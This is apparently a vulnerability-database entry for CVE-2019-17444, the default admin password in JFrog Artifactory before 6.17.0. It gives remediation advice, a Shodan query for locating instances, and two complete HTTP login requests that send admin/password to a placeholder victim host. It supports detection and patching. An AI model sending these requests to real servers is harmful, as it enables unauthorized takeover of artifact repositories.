| Title | Jfrog Artifactory <6.17.0 - Default Admin Password |
|---|---|
| Author | pdteam |
| Severity | Critical |
| Impact | An attacker can gain unauthorized access to the Jfrog Artifactory instance. |
| Remediation | Upgrade Jfrog Artifactory to version 6.17.0 or later and change the default admin password to a strong, unique one. |
| CVSS Score | 9.8 |
| EPSS Score | 0.92338 |
| CVE ID | CVE-2019-17444 |
| CWE ID | CWE-521 |
| Shodan Query | cpe:"cpe:2.3:a:jfrog:artifactory" |
| Tags | cve cve2019 jfrog default-login - vuln |
Jfrog Artifactory prior to 6.17.0 uses default passwords (such as “password”) for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory.
POST /artifactory/ui/auth/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Content-Length: 53
Content-Type: application/json;charset=UTF-8
Origin: /
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
Connection: close
{"user":"admin","password":"password","type":"login"}
POST /ui/auth/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Content-Length: 53
Content-Type: application/json;charset=UTF-8
Origin: /
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
Connection: close
{"user":"admin","password":"password","type":"login"}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17444.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-17444.pcap
N/AN/A